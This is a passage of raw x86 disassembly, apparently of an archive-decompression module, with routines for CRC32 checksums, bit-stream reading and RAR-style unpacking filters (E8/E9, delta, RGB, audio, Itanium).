mov eax, [ebp+var_C]
lea edi, [ebx+654h]
inc eax
call sub_9B2613
test eax, eax
jz short loc_9B37E7
mov eax, esi
mov ecx, ebx
call sub_9B2B65
test eax, eax
jnz short loc_9B37EB
loc_9B37E7: ; CODE XREF: sub_9B3705+D3�j
mov eax, edi
jmp short loc_9B37AD
; ---------------------------------------------------------------------------
loc_9B37EB: ; CODE XREF: sub_9B3705+89�j
; sub_9B3705+E0�j
xor eax, eax
cmp [ebx+4], eax
setnz al
loc_9B37F3: ; CODE XREF: sub_9B3705+AF�j
pop esi
loc_9B37F4: ; CODE XREF: sub_9B3705+C0�j
pop edi
pop ebx
leave
retn
sub_9B3705 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B37F8 proc near ; CODE XREF: sub_9B1364+13�p
; sub_9B1364+33�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
mov edx, [esi+4]
mov ecx, [esi+654h]
cmp edx, ecx
push edi
jbe short loc_9B3835
mov edi, [esi+65Ch]
cmp edx, edi
ja short loc_9B3835
cmp word ptr [edx+0Ah], 1
jz short loc_9B383D
mov eax, [edx+4]
cmp eax, ecx
jbe short loc_9B3835
cmp eax, edi
ja short loc_9B3835
mov edi, edx
call sub_9B3221
loc_9B3831: ; CODE XREF: sub_9B37F8+137�j
test eax, eax
jnz short loc_9B3844
loc_9B3835: ; CODE XREF: sub_9B37F8+14�j
; sub_9B37F8+1E�j ...
or eax, 0FFFFFFFFh
loc_9B3838: ; CODE XREF: sub_9B37F8+1C9�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B383D: ; CODE XREF: sub_9B37F8+25�j
mov ecx, esi
call sub_9B3378
loc_9B3844: ; CODE XREF: sub_9B37F8+3B�j
mov ecx, [esi+868h]
lea eax, [esi+864h]
mov edx, [eax]
mov edi, edx
imul edi, ecx
add [esi+85Ch], edi
mov edi, [esi+86Ch]
sub edi, ecx
imul edi, edx
mov [eax], edi
cmp dword ptr [esi], 0
jz short loc_9B389C
mov eax, [esi]
movzx edi, byte ptr [eax+4]
xor ebx, ebx
cmp [esi+878h], ebx
jnz loc_9B3934
mov eax, [eax]
cmp eax, [esi+654h]
jbe loc_9B3934
mov [esi+8], eax
mov [esi+4], eax
jmp loc_9B3965
; ---------------------------------------------------------------------------
loc_9B389C: ; CODE XREF: sub_9B37F8+75�j
; sub_9B37F8+FC�j
mov eax, [esi+85Ch]
mov ecx, [esi+864h]
lea edx, [eax+ecx]
xor edx, eax
cmp edx, 1000000h
jb short loc_9B38CA
cmp ecx, 8000h
jnb short loc_9B38F6
neg eax
and eax, 7FFFh
mov [esi+864h], eax
loc_9B38CA: ; CODE XREF: sub_9B37F8+BB�j
push [ebp+arg_8]
lea ebx, [esi+860h]
push [ebp+arg_4]
call sub_9B05B9
shl dword ptr [esi+864h], 8
pop ecx
pop ecx
mov ecx, [ebx]
shl ecx, 8
or eax, ecx
shl dword ptr [esi+85Ch], 8
mov [ebx], eax
jmp short loc_9B389C
; ---------------------------------------------------------------------------
loc_9B38F6: ; CODE XREF: sub_9B37F8+C3�j
mov eax, [esi+654h]
loc_9B38FC: ; CODE XREF: sub_9B37F8+130�j
mov ecx, [esi+4]
inc dword ptr [esi+878h]
mov ebx, [ecx]
cmp ebx, eax
mov [esi+4], ebx
jbe loc_9B3835
cmp ebx, [esi+65Ch]
ja loc_9B3835
movzx ecx, word ptr [ebx+0Ah]
cmp ecx, [esi+650h]
jz short loc_9B38FC
call sub_9B3542
jmp loc_9B3831
; ---------------------------------------------------------------------------
loc_9B3934: ; CODE XREF: sub_9B37F8+85�j
; sub_9B37F8+93�j
push esi
call sub_9B2F62
test eax, eax
pop ecx
jz loc_9B3835
lea eax, [esi+4C88h]
cmp [eax], bl
jnz short loc_9B3965
push 100h ; Size
mov byte ptr [eax], 1
lea eax, [esi+888h]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9B3965: ; CODE XREF: sub_9B37F8+9F�j
; sub_9B37F8+153�j ...
mov eax, [esi+85Ch]
mov ecx, [esi+864h]
lea edx, [eax+ecx]
xor edx, eax
cmp edx, 1000000h
jb short loc_9B3993
cmp ecx, 8000h
jnb short loc_9B39BF
neg eax
and eax, 7FFFh
mov [esi+864h], eax
loc_9B3993: ; CODE XREF: sub_9B37F8+184�j
push [ebp+arg_8]
lea ebx, [esi+860h]
push [ebp+arg_4]
call sub_9B05B9
shl dword ptr [esi+864h], 8
pop ecx
pop ecx
mov ecx, [ebx]
shl ecx, 8
or eax, ecx
shl dword ptr [esi+85Ch], 8
mov [ebx], eax
jmp short loc_9B3965
; ---------------------------------------------------------------------------
loc_9B39BF: ; CODE XREF: sub_9B37F8+18C�j
mov eax, edi
jmp loc_9B3838
sub_9B37F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B39C6 proc near ; CODE XREF: sub_9B0681+21�p
; sub_9B0681+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
mov ecx, [ebp+arg_4]
jz short loc_9B39D9
mov al, byte ptr [ebp+arg_8]
mov [ecx], al
pop ebp
retn
; ---------------------------------------------------------------------------
loc_9B39D9: ; CODE XREF: sub_9B39C6+A�j
mov eax, [ebp+arg_8]
mov [ecx], eax
pop ebp
retn
sub_9B39C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B39E0 proc near ; CODE XREF: sub_9B05F5+35�p
; sub_9B3BA1+9F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push edi
mov edi, [ebp+arg_8]
test edi, edi
jz short loc_9B3A1C
push esi
loc_9B39EF: ; CODE XREF: sub_9B39E0+39�j
movzx eax, byte ptr [ecx]
push 8
inc ecx
pop esi
loc_9B39F6: ; CODE XREF: sub_9B39E0+36�j
mov edx, eax
xor edx, [ebp+arg_0]
test dl, 1
jz short loc_9B3A10
mov edx, [ebp+arg_0]
shr edx, 1
xor edx, 0EDB88320h
mov [ebp+arg_0], edx
jmp short loc_9B3A13
; ---------------------------------------------------------------------------
loc_9B3A10: ; CODE XREF: sub_9B39E0+1E�j
shr [ebp+arg_0], 1
loc_9B3A13: ; CODE XREF: sub_9B39E0+2E�j
shr eax, 1
dec esi
jnz short loc_9B39F6
dec edi
jnz short loc_9B39EF
pop esi
loc_9B3A1C: ; CODE XREF: sub_9B39E0+C�j
mov eax, [ebp+arg_0]
pop edi
pop ebp
retn
sub_9B39E0 endp
; =============== S U B R O U T I N E =======================================
sub_9B3A22 proc near ; CODE XREF: sub_9B143F+F8�p
arg_0 = dword ptr 4
push 40004h ; Size
call sub_9B254A
pop ecx
mov ecx, [esp+arg_0]
mov [ecx], eax
xor ecx, ecx
test eax, eax
setnz cl
mov eax, ecx
retn
sub_9B3A22 endp
; =============== S U B R O U T I N E =======================================
sub_9B3A3D proc near ; CODE XREF: sub_9B202D+FA�p
; sub_9B221A+176�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B3A57
mov eax, [esi]
test eax, eax
jz short loc_9B3A57
push eax ; Memory
call free
and dword ptr [esi], 0
pop ecx
loc_9B3A57: ; CODE XREF: sub_9B3A3D+7�j
; sub_9B3A3D+D�j
pop esi
retn
sub_9B3A3D endp
; =============== S U B R O U T I N E =======================================
sub_9B3A59 proc near ; CODE XREF: sub_9B0E04+251�p
; sub_9B0E04+2E6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
add eax, [ecx+0Ch]
mov edx, eax
sar edx, 3
add [ecx+8], edx
and eax, 7
mov [ecx+0Ch], eax
retn
sub_9B3A59 endp
; =============== S U B R O U T I N E =======================================
sub_9B3A73 proc near ; CODE XREF: sub_9B0E04+241�p
; sub_9B0E04+2D2�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, [edx]
mov eax, [edx+8]
push ebx
xor ebx, ebx
add eax, ecx
mov bh, [eax]
push 8
pop ecx
sub ecx, [edx+0Ch]
mov bl, [eax+1]
movzx eax, byte ptr [eax+2]
shl ebx, 8
or ebx, eax
shr ebx, cl
and ebx, 0FFFFh
mov eax, ebx
pop ebx
retn
sub_9B3A73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3AA1 proc near ; CODE XREF: sub_9B0E04+26�p
; sub_9B0E04+18C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push esi
call sub_9B3A73
pop ecx
mov ecx, eax
and ecx, 0C000h
jz loc_9B3B82
cmp ecx, 4000h
jz loc_9B3B55
mov eax, [esi+0Ch]
inc eax
inc eax
cmp ecx, 8000h
push esi
mov ecx, eax
jz short loc_9B3B2F
mov ebx, eax
sar ecx, 3
add [esi+8], ecx
and ebx, 7
mov [esi+0Ch], ebx
call sub_9B3A73
add ebx, 10h
mov edi, eax
mov eax, [esi+8]
mov ecx, ebx
sar ecx, 3
add eax, ecx
and ebx, 7
push esi
shl edi, 10h
mov [ebp+var_4], eax
mov [esi+8], eax
mov [esi+0Ch], ebx
call sub_9B3A73
or edi, eax
pop ecx
lea eax, [ebx+10h]
pop ecx
mov ecx, eax
sar ecx, 3
add ecx, [ebp+var_4]
and eax, 7
mov [esi+0Ch], eax
mov [esi+8], ecx
mov eax, edi
jmp short loc_9B3B9C
; ---------------------------------------------------------------------------
loc_9B3B2F: ; CODE XREF: sub_9B3AA1+39�j
mov edi, eax
sar ecx, 3
add [esi+8], ecx
mov ebx, [esi+8]
and edi, 7
mov [esi+0Ch], edi
call sub_9B3A73
pop ecx
lea ecx, [edi+10h]
mov edx, ecx
sar edx, 3
add edx, ebx
mov [esi+8], edx
jmp short loc_9B3B7D
; ---------------------------------------------------------------------------
loc_9B3B55: ; CODE XREF: sub_9B3AA1+25�j
test ah, 3Ch
mov ecx, [esi+0Ch]
jnz short loc_9B3B6A
shr eax, 2
or eax, 0FFFFFF00h
add ecx, 0Eh
jmp short loc_9B3B75
; ---------------------------------------------------------------------------
loc_9B3B6A: ; CODE XREF: sub_9B3AA1+BA�j
shr eax, 6
and eax, 0FFh
add ecx, 0Ah
loc_9B3B75: ; CODE XREF: sub_9B3AA1+C7�j
mov edx, ecx
sar edx, 3
add [esi+8], edx
loc_9B3B7D: ; CODE XREF: sub_9B3AA1+B2�j
and ecx, 7
jmp short loc_9B3B99
; ---------------------------------------------------------------------------
loc_9B3B82: ; CODE XREF: sub_9B3AA1+19�j
mov ecx, [esi+0Ch]
add ecx, 6
mov edx, ecx
sar edx, 3
add [esi+8], edx
shr eax, 0Ah
and ecx, 7
and eax, 0Fh
loc_9B3B99: ; CODE XREF: sub_9B3AA1+DF�j
mov [esi+0Ch], ecx
loc_9B3B9C: ; CODE XREF: sub_9B3AA1+8C�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B3AA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3BA1 proc near ; CODE XREF: sub_9B4C4B+67�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
push edi
push [ebp+arg_0]
mov [ebp+var_54], 35h
push 0FFFFFFFFh
mov [ebp+var_50], 0AD576887h
mov [ebp+var_4C], 1
mov [ebp+var_48], 39h
mov [ebp+var_44], 3CD7E57Eh
mov [ebp+var_40], 2
mov [ebp+var_3C], 78h
mov [ebp+var_38], 3769893Fh
mov [ebp+var_34], 3
mov [ebp+var_30], 1Dh
mov [ebp+var_2C], 0E06077Dh
mov [ebp+var_28], 6
mov [ebp+var_24], 95h
mov [ebp+var_20], 1C2C5DC8h
mov [ebp+var_1C], 4
mov [ebp+var_18], 0D8h
mov [ebp+var_14], 0BC85E701h
mov [ebp+var_10], 5
mov [ebp+var_C], 28h
mov [ebp+var_8], 46B9C560h
mov [ebp+var_4], 7
call sub_9B39E0
add esp, 0Ch
not eax
xor edx, edx
lea ecx, [ebp+var_54]
loc_9B3C4F: ; CODE XREF: sub_9B3BA1+BE�j
cmp [ecx+4], eax
jnz short loc_9B3C58
cmp [ecx], edi
jz short loc_9B3C65
loc_9B3C58: ; CODE XREF: sub_9B3BA1+B1�j
inc edx
add ecx, 0Ch
cmp edx, 7
jb short loc_9B3C4F
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_9B3C65: ; CODE XREF: sub_9B3BA1+B5�j
lea eax, [edx+edx*2]
mov eax, [ebp+eax*4+var_4C]
leave
retn
sub_9B3BA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B3C6E(int,int,void *Src,int)
sub_9B3C6E proc near ; CODE XREF: sub_9B06DE+CE�p
; sub_9B06DE+E7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
mov eax, 40000h
cmp ecx, eax
jnb short loc_9B3CA1
mov edx, [ebp+arg_0]
mov edx, [edx]
add edx, ecx
cmp [ebp+Src], edx
jz short loc_9B3CA1
sub eax, ecx
cmp [ebp+arg_C], eax
jnb short loc_9B3C93
mov eax, [ebp+arg_C]
loc_9B3C93: ; CODE XREF: sub_9B3C6E+20�j
push eax ; Size
push [ebp+Src] ; Src
push edx ; Dst
call memmove
add esp, 0Ch
loc_9B3CA1: ; CODE XREF: sub_9B3C6E+D�j
; sub_9B3C6E+19�j
pop ebp
retn
sub_9B3C6E endp
; =============== S U B R O U T I N E =======================================
sub_9B3CA3 proc near ; CODE XREF: sub_9B4244+38�p
; sub_9B4244+43�p
arg_0 = dword ptr 4
cmp dword ptr [eax+4], 2
jnz short loc_9B3CBC
mov ecx, [eax]
mov eax, [eax+0Ch]
add eax, [ecx]
mov ecx, [esp+arg_0]
and eax, 3FFFFh
add eax, [ecx]
retn
; ---------------------------------------------------------------------------
loc_9B3CBC: ; CODE XREF: sub_9B3CA3+4�j
mov eax, [eax]
retn
sub_9B3CA3 endp
; =============== S U B R O U T I N E =======================================
sub_9B3CBF proc near ; CODE XREF: sub_9B3D50+441�p
; sub_9B3D50+455�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cdq
push 8
pop esi
idiv esi
xor edx, edx
push 20h
movzx esi, byte ptr [eax+ecx]
inc eax
mov dh, [eax+ecx]
lea eax, [eax+ecx+1]
mov ecx, [esp+8+arg_0]
and ecx, 7
or esi, edx
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
or eax, 0FFFFFFFFh
shl edx, 10h
or edx, esi
shr edx, cl
pop ecx
sub ecx, [esp+4+arg_4]
pop esi
shr eax, cl
and eax, edx
retn
sub_9B3CBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3CFF proc near ; CODE XREF: sub_9B3D50+469�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov eax, ecx
push 8
cdq
pop esi
idiv esi
and ecx, 7
push 20h
or edx, 0FFFFFFFFh
xor edi, edi
mov esi, eax
mov eax, ecx
pop ecx
sub ecx, [ebp+arg_8]
shr edx, cl
mov ecx, eax
mov eax, [ebp+arg_0]
shl [ebp+arg_4], cl
shl edx, cl
add esi, eax
not edx
loc_9B3D2E: ; CODE XREF: sub_9B3CFF+4B�j
mov al, [esi+edi]
and al, dl
or al, byte ptr [ebp+arg_4]
shr [ebp+arg_4], 8
shr edx, 8
or edx, 0FF000000h
mov [esi+edi], al
inc edi
cmp edi, 4
jl short loc_9B3D2E
pop edi
pop esi
pop ebp
retn
sub_9B3CFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3D50 proc near ; CODE XREF: sub_9B4244+607�p
Dst = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
mov esi, ecx
xor edi, edi
cmp esi, edi
jle loc_9B4240
cmp esi, 2
push ebx
jle loc_9B41D8
cmp esi, 3
jz loc_9B4124
cmp esi, 4
jz loc_9B4004
cmp esi, 5
jz loc_9B3E3D
cmp esi, 6
jz short loc_9B3DE4
cmp esi, 7
jnz loc_9B423F
mov edi, [eax+14h]
xor esi, esi
cmp edi, 1E000h
mov ebx, edi
jge loc_9B423F
test edi, edi
jle short loc_9B3DCD
loc_9B3DAE: ; CODE XREF: sub_9B3D50+7B�j
mov ecx, [eax]
mov dl, [ecx+esi]
inc esi
cmp dl, 2
jnz short loc_9B3DC5
mov dl, [ecx+esi]
inc esi
cmp dl, 2
jz short loc_9B3DC5
add dl, 0E0h
loc_9B3DC5: ; CODE XREF: sub_9B3D50+67�j
; sub_9B3D50+70�j
mov [ecx+ebx], dl
inc ebx
cmp esi, edi
jl short loc_9B3DAE
loc_9B3DCD: ; CODE XREF: sub_9B3D50+5C�j
mov ecx, [eax]
sub ebx, edi
mov [ecx+3C01Ch], ebx
mov eax, [eax]
mov [eax+3C020h], edi
jmp loc_9B423F
; ---------------------------------------------------------------------------
loc_9B3DE4: ; CODE XREF: sub_9B3D50+3C�j
mov edx, [eax+14h]
mov ecx, [eax+4]
mov edi, [eax]
xor ebx, ebx
cmp edx, 1E000h
mov [ebp+var_2C], ecx
lea esi, [edx+edx]
mov [edi+3C020h], edx
jge loc_9B423F
and [ebp+var_8], ebx
test ecx, ecx
jle loc_9B423F
loc_9B3E11: ; CODE XREF: sub_9B3D50+E6�j
mov edi, [ebp+var_8]
xor cl, cl
add edi, edx
jmp short loc_9B3E29
; ---------------------------------------------------------------------------
loc_9B3E1A: ; CODE XREF: sub_9B3D50+DB�j
mov esi, [eax]
sub cl, [esi+ebx]
inc ebx
mov [esi+edi], cl
add edi, [ebp+var_2C]
lea esi, [edx+edx]
loc_9B3E29: ; CODE XREF: sub_9B3D50+C8�j
cmp edi, esi
jl short loc_9B3E1A
inc [ebp+var_8]
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_2C]
jl short loc_9B3E11
jmp loc_9B423F
; ---------------------------------------------------------------------------
loc_9B3E3D: ; CODE XREF: sub_9B3D50+33�j
mov esi, [eax+14h]
cmp esi, 1E000h
mov ecx, [eax+4]
mov eax, [eax]
lea edx, [eax+esi]
mov [ebp+var_38], ecx
mov [ebp+var_20], esi
mov [ebp+var_18], eax
mov [ebp+var_28], edx
mov [eax+3C020h], esi
jge loc_9B423F
cmp ecx, edi
mov [ebp+var_8], edi
jle loc_9B423F
jmp short loc_9B3E76
; ---------------------------------------------------------------------------
loc_9B3E73: ; CODE XREF: sub_9B3D50+2A9�j
mov esi, [ebp+var_20]
loc_9B3E76: ; CODE XREF: sub_9B3D50+121�j
xor ebx, ebx
push 1Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_34], ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], ebx
mov [ebp+var_14], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call memset
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_2C], ebx
cmp eax, esi
jmp loc_9B3FE7
; ---------------------------------------------------------------------------
loc_9B3EA6: ; CODE XREF: sub_9B3D50+29A�j
mov eax, [ebp+var_30]
mov esi, [ebp+var_C]
mov edx, [ebp+var_10]
mov ecx, eax
sub ecx, [ebp+var_24]
mov edi, ebx
mov ebx, ecx
imul esi, edi
mov ecx, [ebp+var_18]
imul edx, ebx
mov cl, [ecx]
add esi, edx
mov edx, [ebp+var_14]
imul edx, eax
inc [ebp+var_18]
add esi, edx
mov edx, [ebp+var_34]
mov [ebp+var_24], eax
mov [ebp+var_1], cl
lea eax, [esi+edx*8]
mov esi, [ebp+var_1C]
movzx ecx, cl
shr eax, 3
and eax, 0FFh
sub eax, ecx
mov ecx, [ebp+var_28]
mov [ecx+esi], al
movsx esi, [ebp+var_1]
mov cl, al
sub cl, dl
movsx ecx, cl
shl esi, 3
push esi ; X
mov [ebp+var_30], ecx
mov [ebp+var_34], eax
call labs
add [ebp+Dst], eax
mov eax, esi
sub eax, [ebp+var_24]
push eax ; X
call labs
add [ebp+var_50], eax
mov eax, [ebp+var_24]
add eax, esi
push eax ; X
call labs
add [ebp+var_4C], eax
mov eax, esi
sub eax, ebx
push eax ; X
call labs
add [ebp+var_48], eax
lea eax, [esi+ebx]
push eax ; X
call labs
add [ebp+var_44], eax
mov eax, esi
sub eax, edi
push eax ; X
call labs
add [ebp+var_40], eax
add esi, edi
push esi ; X
call labs
add [ebp+var_3C], eax
add esp, 1Ch
test byte ptr [ebp+var_2C], 1Fh
jnz short loc_9B3FDB
mov esi, [ebp+Dst]
xor edi, edi
xor ecx, ecx
mov [ebp+Dst], edi
inc ecx
loc_9B3F70: ; CODE XREF: sub_9B3D50+235�j
lea eax, [ebp+ecx*4+Dst]
mov edx, [eax]
cmp edx, esi
jnb short loc_9B3F7E
mov esi, edx
mov edi, ecx
loc_9B3F7E: ; CODE XREF: sub_9B3D50+228�j
and dword ptr [eax], 0
inc ecx
cmp ecx, 7
jb short loc_9B3F70
mov eax, edi
dec eax
jz short loc_9B3FD2
dec eax
jz short loc_9B3FC7
dec eax
jz short loc_9B3FBC
dec eax
jz short loc_9B3FB1
dec eax
jz short loc_9B3FA6
dec eax
jnz short loc_9B3FDB
cmp [ebp+var_C], 10h
jge short loc_9B3FDB
inc [ebp+var_C]
jmp short loc_9B3FDB
; ---------------------------------------------------------------------------
loc_9B3FA6: ; CODE XREF: sub_9B3D50+246�j
cmp [ebp+var_C], 0FFFFFFF0h
jl short loc_9B3FDB
dec [ebp+var_C]
jmp short loc_9B3FDB
; ---------------------------------------------------------------------------
loc_9B3FB1: ; CODE XREF: sub_9B3D50+243�j
cmp [ebp+var_10], 10h
jge short loc_9B3FDB
inc [ebp+var_10]
jmp short loc_9B3FDB
; ---------------------------------------------------------------------------
loc_9B3FBC: ; CODE XREF: sub_9B3D50+240�j
cmp [ebp+var_10], 0FFFFFFF0h
jl short loc_9B3FDB
dec [ebp+var_10]
jmp short loc_9B3FDB
; ---------------------------------------------------------------------------
loc_9B3FC7: ; CODE XREF: sub_9B3D50+23D�j
cmp [ebp+var_14], 10h
jge short loc_9B3FDB
inc [ebp+var_14]
jmp short loc_9B3FDB
; ---------------------------------------------------------------------------
loc_9B3FD2: ; CODE XREF: sub_9B3D50+23A�j
cmp [ebp+var_14], 0FFFFFFF0h
jl short loc_9B3FDB
dec [ebp+var_14]
loc_9B3FDB: ; CODE XREF: sub_9B3D50+213�j
; sub_9B3D50+249�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_38]
inc [ebp+var_2C]
cmp eax, [ebp+var_20]
loc_9B3FE7: ; CODE XREF: sub_9B3D50+151�j
mov [ebp+var_1C], eax
jl loc_9B3EA6
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+var_38]
jl loc_9B3E73
jmp loc_9B423F
; ---------------------------------------------------------------------------
loc_9B4004: ; CODE XREF: sub_9B3D50+2A�j
mov ecx, [eax+14h]
mov edx, [eax+8]
mov ebx, [eax+4]
mov eax, [eax]
mov [ebp+var_C], edx
sub ebx, 3
cmp ecx, 1E000h
lea edx, [eax+ecx]
mov [ebp+var_20], ecx
mov [ebp+var_18], eax
mov [ebp+var_28], edx
mov [eax+3C020h], ecx
jge loc_9B423F
mov eax, ebx
neg eax
mov [ebp+var_8], edi
mov [ebp+var_24], eax
loc_9B403D: ; CODE XREF: sub_9B3D50+3A3�j
mov eax, [ebp+var_20]
and [ebp+var_1C], 0
cmp [ebp+var_8], eax
jge loc_9B40E9
mov eax, [ebp+var_24]
mov esi, [ebp+var_28]
mov [ebp+var_2C], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_8]
sub esi, ebx
add esi, [ebp+var_8]
push 3
dec eax
xor edx, edx
pop ecx
div ecx
inc eax
mov [ebp+var_10], eax
loc_9B406D: ; CODE XREF: sub_9B3D50+397�j
cmp [ebp+var_2C], 3
jl short loc_9B40C9
movzx edi, byte ptr [esi]
movzx eax, byte ptr [esi-3]
mov [ebp+var_30], edi
sub edi, eax
add edi, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, edi
sub eax, [ebp+var_1C]
push eax ; X
call labs
mov [ebp+var_38], eax
mov eax, edi
sub eax, [ebp+var_30]
push eax ; X
call labs
sub edi, [ebp+var_14]
mov [ebp+var_34], eax
push edi ; X
call labs
mov ecx, [ebp+var_34]
add esp, 0Ch
cmp [ebp+var_38], ecx
jg short loc_9B40BA
cmp [ebp+var_38], eax
jle short loc_9B40C9
loc_9B40BA: ; CODE XREF: sub_9B3D50+363�j
cmp [ebp+var_34], eax
jg short loc_9B40C4
mov eax, [ebp+var_30]
jmp short loc_9B40CC
; ---------------------------------------------------------------------------
loc_9B40C4: ; CODE XREF: sub_9B3D50+36D�j
mov eax, [ebp+var_14]
jmp short loc_9B40CC
; ---------------------------------------------------------------------------
loc_9B40C9: ; CODE XREF: sub_9B3D50+321�j
; sub_9B3D50+368�j
mov eax, [ebp+var_1C]
loc_9B40CC: ; CODE XREF: sub_9B3D50+372�j
; sub_9B3D50+377�j
mov ecx, [ebp+var_18]
sub al, [ecx]
inc [ebp+var_18]
add [ebp+var_2C], 3
movzx eax, al
mov [ebx+esi], al
add esi, 3
dec [ebp+var_10]
mov [ebp+var_1C], eax
jnz short loc_9B406D
loc_9B40E9: ; CODE XREF: sub_9B3D50+2F7�j
inc [ebp+var_8]
inc [ebp+var_24]
cmp [ebp+var_8], 3
jl loc_9B403D
mov esi, [ebp+var_20]
mov eax, [ebp+var_C]
add esi, 0FFFFFFFEh
cmp eax, esi
jge loc_9B423F
mov edx, [ebp+var_28]
loc_9B410D: ; CODE XREF: sub_9B3D50+3CD�j
mov cl, [edx+eax+1]
add [edx+eax], cl
add [edx+eax+2], cl
add eax, 3
cmp eax, esi
jl short loc_9B410D
jmp loc_9B423F
; ---------------------------------------------------------------------------
loc_9B4124: ; CODE XREF: sub_9B3D50+21�j
mov ecx, [eax]
mov [ebp+var_20], ecx
mov ecx, [eax+14h]
cmp ecx, 3C000h
jge loc_9B423F
cmp ecx, 15h
jl loc_9B423F
mov ebx, [eax+1Ch]
lea eax, [ecx-15h]
shr ebx, 4
cmp eax, edi
jbe loc_9B423F
dec eax
shr eax, 4
inc eax
mov [ebp+var_38], eax
loc_9B415A: ; CODE XREF: sub_9B3D50+484�j
mov eax, [ebp+var_20]
movzx eax, byte ptr [eax]
and eax, 1Fh
sub eax, 10h
js short loc_9B41CC
mov al, byte_9BADE8[eax]
test al, al
jz short loc_9B41CC
and [ebp+var_1C], 0
push 12h
movzx edi, al
pop esi
loc_9B417C: ; CODE XREF: sub_9B3D50+47A�j
mov ecx, [ebp+var_1C]
xor eax, eax
inc eax
shl eax, cl
test eax, edi
jz short loc_9B41C1
mov ecx, [ebp+var_20]
lea eax, [esi+18h]
push 4
push eax
call sub_9B3CBF
cmp eax, 5
pop ecx
pop ecx
jnz short loc_9B41C1
mov ecx, [ebp+var_20]
push 14h
push 14h
push esi
call sub_9B3CBF
pop ecx
sub eax, ebx
pop ecx
and eax, 0FFFFFh
push eax
push [ebp+var_20]
mov ecx, esi
call sub_9B3CFF
add esp, 0Ch
loc_9B41C1: ; CODE XREF: sub_9B3D50+436�j
; sub_9B3D50+44B�j
inc [ebp+var_1C]
add esi, 29h
cmp esi, 64h
jle short loc_9B417C
loc_9B41CC: ; CODE XREF: sub_9B3D50+416�j
; sub_9B3D50+420�j
add [ebp+var_20], 10h
inc ebx
dec [ebp+var_38]
jnz short loc_9B415A
jmp short loc_9B423F
; ---------------------------------------------------------------------------
loc_9B41D8: ; CODE XREF: sub_9B3D50+18�j
mov ecx, [eax+14h]
cmp ecx, 3C000h
mov edx, [eax]
mov eax, [eax+1Ch]
jge short loc_9B423F
cmp ecx, 4
jl short loc_9B423F
cmp esi, 2
setz bl
add ecx, 0FFFFFFFCh
add bl, 0E8h
cmp ecx, edi
mov [ebp+var_20], edi
jbe short loc_9B423F
mov esi, eax
loc_9B4202: ; CODE XREF: sub_9B3D50+4ED�j
mov al, [edx]
inc edx
inc [ebp+var_20]
inc esi
